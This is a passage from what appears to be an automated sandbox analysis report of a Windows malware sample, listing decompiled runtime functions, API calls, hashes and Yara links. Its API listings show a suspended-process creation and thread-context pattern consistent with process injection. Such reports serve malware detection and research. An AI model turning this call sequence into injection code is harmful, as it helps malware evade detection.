                                        • CallWindowProcW.USER32(0107F0D0,01080ED8,00000000,00000000,00000000), ref: 01077942
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 546183053-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061DCF, Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x107cd50);
				E010627F0(__ebx, __edi, __esi);
				E01063117(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E010632EE();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x10bfd20 = _t82;
					 *0x10c1b28 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x10bfd20; // 0x12df4b0
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x10bfd20;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x10c1a80; // 0x12e04c0
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91); // executed
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -17562900
											E01062D36(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E0106207A();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E01062835(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x10c1b28 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E010632EE(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x10bfd20[_t149] = _t138;
							 *0x10c1b28 =  *0x10c1b28 + _t141;
							__eflags =  *0x10c1b28;
							while(1) {
								__eflags = _t138 - 0x800 + 0x10bfd20[_t149];
								if(_t138 >= 0x800 + 0x10bfd20[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x10c1b28; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x10bfd20[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E01062D36(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                        0x01061dcf
                                        0x01061dd1
                                        0x01061dd6
                                        0x01061ddd
                                        0x01061de5
                                        0x01061de8
                                        0x01061dec
                                        0x01061ded
                                        0x01061dee
                                        0x01061df5
                                        0x01061df7
                                        0x01061dfc
                                        0x01061e19
                                        0x01061e1e
                                        0x01061e24
                                        0x01061e29
                                        0x01061e2b
                                        0x00000000
                                        0x00000000
                                        0x01061e2d
                                        0x01061e33
                                        0x01061e36
                                        0x01061e39
                                        0x01061e42
                                        0x01061e45
                                        0x01061e4b
                                        0x01061e4e
                                        0x01061e51
                                        0x01061e54
                                        0x01061e57
                                        0x01061e57
                                        0x01061e62
                                        0x01061e68
                                        0x01061e6d
                                        0x01061fa2
                                        0x01061fa4
                                        0x01061fa5
                                        0x01061fa5
                                        0x01061fa5
                                        0x01061fa7
                                        0x01061fa7
                                        0x01061faa
                                        0x01061fad
                                        0x00000000
                                        0x00000000
                                        0x01061fb8
                                        0x01061fbe
                                        0x01061fc1
                                        0x01061fc4
                                        0x01061fd8
                                        0x01061fd8
                                        0x01061fdc
                                        0x01061fde
                                        0x01061fe5
                                        0x01061fea
                                        0x01061fec
                                        0x01061fec
                                        0x01061fe0
                                        0x01061fe2
                                        0x01061fe2
                                        0x01061ff0
                                        0x01061ff6
                                        0x01061ff9
                                        0x01061ffc
                                        0x0106204a
                                        0x01062050
                                        0x01062053
                                        0x01062055
                                        0x0106205a
                                        0x0106205c
                                        0x01062061
                                        0x01062061
                                        0x00000000
                                        0x01061ffe
                                        0x01061ffe
                                        0x01062000
                                        0x00000000
                                        0x00000000
                                        0x01062003
                                        0x01062009
                                        0x0106200b
                                        0x00000000
                                        0x00000000
                                        0x01062010
                                        0x01062012
                                        0x01062017
                                        0x0106201a
                                        0x01062024
                                        0x01062027
                                        0x01062032
                                        0x01062039
                                        0x0106203d
                                        0x01062042
                                        0x01062045
                                        0x01062064
                                        0x01062064
                                        0x00000000
                                        0x01062064
                                        0x0106202d
                                        0x0106202d
                                        0x0106202f
                                        0x0106202f
                                        0x00000000
                                        0x0106202f
                                        0x01062020
                                        0x00000000
                                        0x01062020
                                        0x01061ffc
                                        0x01061fc6
                                        0x01061fc8
                                        0x00000000
                                        0x00000000
                                        0x01061fd0
                                        0x00000000
                                        0x01061fd0
                                        0x0106206a
                                        0x0106206d
                                        0x01062072
                                        0x01062072
                                        0x01062074
                                        0x01062079
                                        0x01062079
                                        0x01061e73
                                        0x01061e76
                                        0x01061e78
                                        0x00000000
                                        0x00000000
                                        0x01061e7e
                                        0x01061e80
                                        0x01061e83
                                        0x01061e86
                                        0x01061e8b
                                        0x01061e93
                                        0x01061e95
                                        0x01061e97
                                        0x01061e99
                                        0x01061e99
                                        0x01061e9e
                                        0x01061e9e
                                        0x01061e9f
                                        0x01061ea2
                                        0x01061ea2
                                        0x01061ea8
                                        0x00000000
                                        0x00000000
                                        0x01061eb4
                                        0x01061eb6
                                        0x01061eb9
                                        0x01061ebb
                                        0x01061f55
                                        0x01061f5c
                                        0x01061f5c
                                        0x01061f62
                                        0x01061f6e
                                        0x01061f70
                                        0x00000000
                                        0x00000000
                                        0x01061f72
                                        0x01061f78
                                        0x01061f7b
                                        0x01061f7e
                                        0x01061f82
                                        0x01061f88
                                        0x01061f8b
                                        0x01061f8e
                                        0x01061f91
                                        0x01061f91
                                        0x01061f96
                                        0x01061f97
                                        0x01061f9a
                                        0x00000000
                                        0x01061f9a
                                        0x01061ec1
                                        0x01061ec7
                                        0x00000000
                                        0x01061ec7
                                        0x01061eca
                                        0x01061ecc
                                        0x01061ed1
                                        0x01061ed2
                                        0x01061ed5
                                        0x01061ed8
                                        0x01061ed8
                                        0x01061eda
                                        0x00000000
                                        0x00000000
                                        0x01061ee0
                                        0x01061ee2
                                        0x01061ee5
                                        0x01061f42
                                        0x01061f42
                                        0x01061f43
                                        0x01061f49
                                        0x01061f4a
                                        0x01061f4d
                                        0x01061f50
                                        0x00000000
                                        0x01061f50
                                        0x01061ee7
                                        0x01061ee9
                                        0x00000000
                                        0x00000000
                                        0x01061eeb
                                        0x01061eed
                                        0x01061eef
                                        0x00000000
                                        0x00000000
                                        0x01061ef1
                                        0x01061ef3
                                        0x01061f03
                                        0x01061f10
                                        0x01061f17
                                        0x01061f1c
                                        0x01061f23
                                        0x01061f2d
                                        0x01061f31
                                        0x01061f36
                                        0x01061f39
                                        0x01061f39
                                        0x01061f39
                                        0x01061f3c
                                        0x01061f3f
                                        0x01061f3f
                                        0x00000000
                                        0x01061f3f
                                        0x01061ef6
                                        0x01061efc
                                        0x01061eff
                                        0x01061f01
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01061f01
                                        0x00000000
                                        0x01061ed8
                                        0x01061e11
                                        0x00000000

                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: f481119ee6157c0910e0551016915561872da90923d11c97671061e2f16f1e82
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: f481119ee6157c0910e0551016915561872da90923d11c97671061e2f16f1e82
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0107F677, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0107F73D
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F767
                                        • ReadFile.KERNELBASE(00000000,00000000,0107FCD3,?,00000000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E), ref: 0107F77E
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F7A0
                                        • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01080190), ref: 0107F812
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 0107F81D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3,00000000), ref: 0107F868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction ID: e1c66225a2a266d1f0fcb884e952f3013b77754b6f05dd7527a641889c235f78
                                        • Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction Fuzzy Hash: 64518171E0532AABDB509FB8CC84FAEBBB8EF18710F144469F591F7280D67099018768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010808B6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 204processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 01080B44
                                        • ExitProcess.KERNEL32(00000000), ref: 01080B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: 5113b86b37df4b07ae03213fe012da79$D
                                        • API String ID: 126409537-89965315
                                        • Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction ID: 333118b19e4f91373b82d0cc3f80f84bfaae992b7b7fa1fa7313d46b8408ec30
                                        • Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction Fuzzy Hash: 50916E30D1838CEEEF12DBE8D845BEDBBB5AF14704F10409AE584BA291D3B50A48DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0107F0DC, Relevance: 6.3, APIs: 4, Instructions: 335processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 0107F206
                                        • GetThreadContext.KERNELBASE(?,?), ref: 0107F225
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107F245
                                        • TerminateProcess.KERNELBASE(00000000,00000000), ref: 0107F455
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadTerminateThread
                                        • String ID:
                                        • API String ID: 3842210937-0
                                        • Opcode ID: 7e6d59f41dd1dff6e9c97aa09afc93795338b72e33108df8e73b414ce0022573
                                        • Instruction ID: 64fa57fc59c32dd401c23dc3d1697a6563f817da3f37265da24063a7fccad709
                                        • Opcode Fuzzy Hash: 7e6d59f41dd1dff6e9c97aa09afc93795338b72e33108df8e73b414ce0022573
                                        • Instruction Fuzzy Hash: A5C16D71D0021AAFEF11DFA8CD44FEDBBB9BF08304F148169E6A4B6190D774A945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0106E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
					if(E0106DB06(_t28, ?str?) != 0) {
						return E0106FA26(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                        0x0106e852
                                        0x0106e857
                                        0x0106e87f
                                        0x00000000
                                        0x0106e8a8
                                        0x0106e89a
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e89c
                                        0x0106e8c4
                                        0x00000000
                                        0x00000000
                                        0x0106e8ca
                                        0x0106e8cf
                                        0x0106e8d3
                                        0x0106e8d3
                                        0x0106e8a1

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010630E7, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E010630E7(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                        0x010630ec
                                        0x010630fc

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0106407B,?,?,?,00000000), ref: 010630EC
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 010630F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 90dac942dfe32f188f806272c1a99005253e138c1bd72a77f1ba84d835a96240
                                        • Instruction ID: 9b445732465233bcead1b2e0da92d74c14f405b87329d727f6696c516b402c74
                                        • Opcode Fuzzy Hash: 90dac942dfe32f188f806272c1a99005253e138c1bd72a77f1ba84d835a96240
                                        • Instruction Fuzzy Hash: AAB09231844209EBCAA22B91E80EB883F28EB04662F01C012F74D64054AB7754508BE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0109C16C, Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
                                        • Instruction ID: 20e333f8e00382b701da1c72a89869598497ffa6709d0dd5a8f2e5b35bc93b47
                                        • Opcode Fuzzy Hash: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
                                        • Instruction Fuzzy Hash: E8022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0109C170, Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                        • Instruction ID: 07c5dfced5b4db167729cffbadfc537b9c4f888f9dced34af1aa62f749b3b5ce
                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
